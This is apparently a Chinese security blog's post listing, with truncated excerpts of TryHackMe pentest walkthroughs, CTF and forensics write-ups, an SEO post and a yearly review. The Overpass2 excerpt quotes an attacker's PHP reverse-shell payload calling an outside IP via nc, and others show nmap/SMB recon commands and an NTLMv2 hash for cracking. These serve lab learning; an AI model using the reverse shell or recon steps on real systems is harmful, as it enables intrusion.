Offensive Pentesting-Internal
Offensive Pentesting-Internal信息搜集先扫端口
nmap -T4 -sC -sV -Pn 10.10.216.2
发现80端口存在web服务
在扫一下目录
dirsearch -u http://10.10.113.49/ -i 200
[19:42:18] 200 - 2KB - /blog/wp-login.php
[19:42:18] 200 - 18KB - /blog/
[19:43:15] 200 - 3KB - /phpmyadmin/doc/html/index.html
[19:43:16] 200 - 3KB - /phpmyadmin/
[19:43:16] 200 - 3KB - /phpmyadmin/index.php ...
Offensive Pentesting-Relevant
Offensive Pentesting-Relevant这个靶机算是对Advanced Exploitation部分的一个总结利用 并没有像之前的几个靶机一样 给出循序渐进的步骤 而是相对开放的让我们自行去进行渗透测试
端口扫描先是使用nmap来扫
nmap -A -p- -v -Pn 10.10.228.206
发现扫到的80和49663端口都是一样的web服务 同时也发现开放了139和445端口 可能存在共享文件夹服务
共享文件夹服务继续用nmap跑一下共享文件夹的服务
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.228.206
发现后两个是存在读写权限的
尝试连接 \\10.10.228.206\nt4wrksv
smbclient //10.10.228.206/nt4wrksv
看到一个passwords.txt导出查看
smbget -R smb://10.10.241.61/nt4wrksv
[User Passwords - Encoded]
Qm9iIC0gI ...
Offensive Pentesting-HackPark
Offensive Pentesting-HackParkBruteforce a websites login with Hydra, identify and use a public exploit then escalate your privileges on this Windows machine
使用 Hydra 暴力登录网站,识别并使用公共漏洞,然后升级您在此 Windows 计算机上的权限!
Deploy the vulnerable Windows machineConnect to our network and deploy this machine. Please be patient as this machine can take up to 5 minutes to boot! You can test if you are connected to our network, by going to our access page. Please note that this machine does not respond to ping (ICM ...
对博客进行SEO优化
对博客进行SEO优化前言很长一段时间里 发现如果不是在公开场合(包括但不限于pyq或者一些比赛群里面)发过我自己文章的链接的话 文章的浏览量很低 再一次比赛结束之后 学弟和我都发了一篇比赛的wp 他的博客是直接用的博客园 经过搜索发现 他的文章很容易就找到了 在我搜索引擎的第一页 而我的文章翻了好几页都找不到 遂打算对我的博客进行一下SEO优化
本篇文章进行的SEO优化操作参考Butterfly 进阶篇(一) - SEO 优化搜索引擎收录
站点文章目录优化我们可以发现 如果直接使用hexo来搭建博客的话 一般来讲文章的地址路径是[网站url/年/月/日/文章名称的url编码]
类似
https://w3nx1z1.github.io/2024/12/31/2024%E5%B9%B4%E5%B9%B4%E5%BA%A6%E6%80%BB%E7%BB%93/
但是这种复杂的结构不利于搜索引擎对我们网站文章的爬虫 一般来说最好是在三层目录结构之内
因此我们使用hexo-abbrlink插件
# 安装
npm install hexo-abbrl ...
2025启航杯wp
2025启航杯wp本次启航杯可以说是槽点满满 本来和几位师傅一起想冲击第一 但是最后就差一道win06 遗憾第二 拼尽全力无法战胜
reChecker
就一个xor 0x23直接秒了
EXP
data = [0x72, 0x6B, 0x60, 0x77, 0x65, 0x58, 0x46, 0x46, 0x15, 0x40,
0x14, 0x41, 0x1A, 0x40, 0x0E, 0x46, 0x14, 0x45, 0x16, 0x0E,
0x17, 0x45, 0x42, 0x41, 0x0E, 0x1A, 0x41, 0x47, 0x45, 0x0E,
0x46, 0x42, 0x13, 0x14, 0x46, 0x13, 0x10, 0x17, 0x45, 0x15,
0x42, 0x16, 0x5E]
for i in data:
print(chr(i ^ 0x23),end="")
rainbow
别的都不重要直接看xor函数发现就是异或了90
EXP
import binascii
data ...
2025龙信考核比武
2025龙信考核比武很奇妙的一次体验,主办方提供的检材在比赛当天凌晨发现出问题了,临时又进行更换,好在睡得晚及时重新下载了
本身题的难度不是很高,但不知道为啥做的时候脑子好像短路了一样,在这里写个复盘 仅代表个人观点 正确答案以官方公布为准 欢迎师傅们来交流
镜像链接:https://pan.baidu.com/s/1a9bQ4S5Soz5L6nSvkmiPIg?pwd=6j6r
容器密码:MjAyNeWKoOayuQ==
1.分析手机备份,该机主的qq号为1203494553
2.分析手机备份文件,该机主的微信号为?(标准格式:abcdefg)wxid_oa8u5syonjcp22
这里应该写的是微信内部id
3.请问该手机机主微信共有_____个现有好友?(标准格式:12)16
4.请分析机主的银行卡卡号是多少?(标准格式:按照实际值填写)6231276371853671344
这里使用龙信的手机分析可以直接分析出来
当然找数据库也是可以的 路径是data/com.hallo330.app1.YongYou/ab826feedee08f7a50ea89cc830 ...
2024冀信杯决赛
2024冀信杯决赛本次比赛 我们SeeU-Sec是第一
在这里记录几道比较有意思的题目 赛制分成三部分:安全运维、应急响应、综合渗透
渗透部分还是狠狠的败北了 只做了一个后台的密码爆破和sql报错注入 分数的大头还是在应急和安全运维部分
日志和注册表分析题目具体是什么记得不是很清楚了 大概意思好像是存在一个攻击者创建后门用户的行为 需要找到创建的这个用户和密码
首先给到的是一个evtx的windows日志文件 直接用windows默认的日志工具打开也行 但是不是很方便检索
可以先用Win_logs_parse_tool工具把evtx文件提取成xml文件和html文件 转化之后如图
根据windows的事件ID 4720对应的事件是windows创建用户的 直接搜索这个id 找到对应的事件记录 可以在事件详情中找到创建的账户名称 是2Ha0c2K34ruiop$
使用这个用户名可以解压附件中的SAM.zip 注册表文件压缩包 里面有三个注册表文件
我们通过注册表可以获取windows用户密码的哈希值 但是不能直接拿到明文
只需要sam和system这两个注册表 利用mimika ...
DASCTF 2024最后一战 | Misc
DASCTF 2024最后一战 | Misc弹道偏下上来打开流量包就看到有加密的SMB3流量
大概率是需要咱们爆破NTLMv2哈希 先用脚本提取一下 只有一个用户的哈希
share::MicrosoftAccount:0a08d9f15eb53eea:a20aec951c89961f2e81bf0917d8990a:0101000000000000cfebd19d3636db01022ada3cfbb5b30e0000000002001e004400450053004b0054004f0050002d004800440039004b0051004e00540001001e004400450053004b0054004f0050002d004800440039004b0051004e00540004001e004400450053004b0054004f0050002d004800440039004b0051004e00540003001e004400450053004b0054004f0050002d004800440039004b0051004e00540007000800cf ...
w3nx1z1的2024年度个人总结
2024年年度总结时间过得真快 距离上一次写年度总结已经过去了一年的时间 上次写的时候自己还是一个萌新,此时已经是个快退役的老赛棍了。
今年是非常特殊的一年,记录了我和社团还有我的网安学习道路上的很多第一次、很多难忘的时刻。
今年真得是参加了很多比赛,不管是线上的还是线下的,拿了不少奖,其中很多是弥补了去年的遗憾吧。
正常的警校生活可能只能允许我在有限的紧张的假期时间去探索祖国的大好河山,因此非常感谢当初的自己可以选择学习网安这条道路,在同学们只能在苦逼的校园中度日的时候,我还能一点点的去点亮地图哈哈哈,希望新的一年里可以去更多的地方。
下面一点点来回顾这一年的时光。
2024.1还记得今年过年挺晚的 因为一些原因,刚放假就被拉去练车,当时还因为考科二没打成獬豸杯,失去一次拿奖机会哈哈哈
月底还打了西湖论剑,很遗憾的一次战斗,差一题就进了,马上这届西湖还有半个多月就要开打了,希望25年可以打到线下,真的想再去一次杭州好吧!
2024.4铁三初赛记得是三月底打的,和20届的老学长们最后一次线下并肩作战,初赛还好,记得打到了前几名。
没想到4月底的半决赛拉了,一个学长因为要考公没来,另一 ...
Offensive Pentesting-Overpass2
Offensive Pentesting-Overpass2这个room主要是一个流量分析溯源取证的 难度相对来说比较简单 同时分析完攻击行为之后 我们可以利用流量包中的记录来进行攻击靶机
Forensics - Analyse the PCAP下载下来附件是一个流量包 直接追踪tcp流
第一个流中 上传了一个反弹shell马
他们用来上传反向 shell 的页面的 URL 是什么?
/development
攻击者使用什么有效负载来获取访问权限?
<?php exec("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.170.145 4242 >/tmp/f")?>
第三个流中就是一个反弹到shell后执行命令的记录
也能看到使用su james命令登陆到了james用户
攻击者使用什么密码来获取权限?
whenevernoteartinstant
往后看到执行了sudo -l命令查看了当前james用户的sudo权限规则 查看哪些命令可以被执行
...